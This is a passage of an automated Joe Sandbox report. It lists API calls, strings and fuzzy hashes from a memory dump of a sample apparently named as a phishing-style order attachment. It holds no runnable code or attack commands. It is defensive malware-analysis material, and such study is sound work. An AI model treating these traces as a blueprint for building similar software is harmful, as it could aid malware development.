                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 290601579-0
                                        APIs
                                        • memchr.MSVCRT ref: 00444EBF
                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                        • memset.MSVCRT ref: 0044505E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memchrmemset
                                        • String ID: PD$PD
                                        • API String ID: 1581201632-2312785699
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                        • GetDC.USER32(00000000), ref: 00409F6E
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
                                        • GetParent.USER32(?), ref: 00409FA5
                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                        • String ID:
                                        • API String ID: 2163313125-0
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        APIs
                                        • memset.MSVCRT ref: 0040A47B
                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                        • wcslen.MSVCRT ref: 0040A4BA
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • wcslen.MSVCRT ref: 0040A4E0
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)$YV@
                                        • API String ID: 3979103747-598926743
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                        • wcslen.MSVCRT ref: 0040A6B1
                                        • wcscpy.MSVCRT ref: 0040A6C1
                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                        • wcscpy.MSVCRT ref: 0040A6DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        APIs
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • wcscpy.MSVCRT ref: 0040DAFB
                                        • wcscpy.MSVCRT ref: 0040DB0B
                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 3176057301-2039793938
                                        APIs
                                        Strings
                                        • too many attached databases - max %d, xrefs: 0042F64D
                                        • database %s is already in use, xrefs: 0042F6C5
                                        • unable to open database: %s, xrefs: 0042F84E
                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                        • database is already attached, xrefs: 0042F721
                                        • out of memory, xrefs: 0042F865
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                        • API String ID: 1297977491-2001300268
                                        APIs
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                        • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        APIs
                                        • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                        • Sleep.KERNEL32(00000001), ref: 004178E9
                                        • GetLastError.KERNEL32 ref: 004178FB
                                        • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$ErrorLastLockSleepUnlock
                                        • String ID:
                                        • API String ID: 3015003838-0
                                        APIs
                                        • memset.MSVCRT ref: 00407E44
                                        • memset.MSVCRT ref: 00407E5B
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                        • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                        • wcscpy.MSVCRT ref: 00407F10
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                        • String ID:
                                        • API String ID: 59245283-0
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                        • GetLastError.KERNEL32 ref: 0041855C
                                        • Sleep.KERNEL32(00000064), ref: 00418571
                                        • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                        • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                        • GetLastError.KERNEL32 ref: 0041858E
                                        • Sleep.KERNEL32(00000064), ref: 004185A3
                                        • free.MSVCRT ref: 004185AC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: File$AttributesDeleteErrorLastSleep$free
                                        • String ID:
                                        • API String ID: 2802642348-0
                                        • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                        • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                        • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                        • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                        APIs
                                        • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                        • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                        • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy
                                        • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                        • API String ID: 3510742995-3273207271
                                        • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                        • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                        • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                        • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                        APIs
                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                        • memset.MSVCRT ref: 00413ADC
                                        • memset.MSVCRT ref: 00413AEC
                                          • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                        • memset.MSVCRT ref: 00413BD7
                                        • wcscpy.MSVCRT ref: 00413BF8
                                        • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$wcscpy$CloseHandleOpenProcess
                                        • String ID: 3A
                                        • API String ID: 3300951397-293699754
                                        • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                        • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                        • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                        • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                        • wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                          • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                        • wcslen.MSVCRT ref: 0040D1D3
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                        • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                          • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                        • String ID: strings
                                        • API String ID: 3166385802-3030018805
                                        • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                        • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                        • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                        • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                        APIs
                                        • memset.MSVCRT ref: 00411AF6
                                          • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                        • wcsrchr.MSVCRT ref: 00411B14
                                        • wcscat.MSVCRT ref: 00411B2E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileModuleNamememsetwcscatwcsrchr
                                        • String ID: AE$.cfg$General$EA
                                        • API String ID: 776488737-1622828088
                                        • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                        • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                        • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                        • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                        APIs
                                        • memset.MSVCRT ref: 0040D8BD
                                        • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                        • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                        • memset.MSVCRT ref: 0040D906
                                        • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                        • _wcsicmp.MSVCRT ref: 0040D92F
                                          • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                          • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                        • String ID: sysdatetimepick32
                                        • API String ID: 1028950076-4169760276
                                        • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                        • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                        • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                        • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                        APIs
                                        • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                        • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                        • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                        • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                        • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                        • memset.MSVCRT ref: 0041BA3D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                         • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memset
                                        • String ID: -journal$-wal
                                        • API String ID: 438689982-2894717839
                                        • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                        • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                        • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                        • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                        APIs
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                        • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                        • EndDialog.USER32(?,00000002), ref: 00405C83
                                        • EndDialog.USER32(?,00000001), ref: 00405C98
                                          • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                          • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                        • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                        • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmp
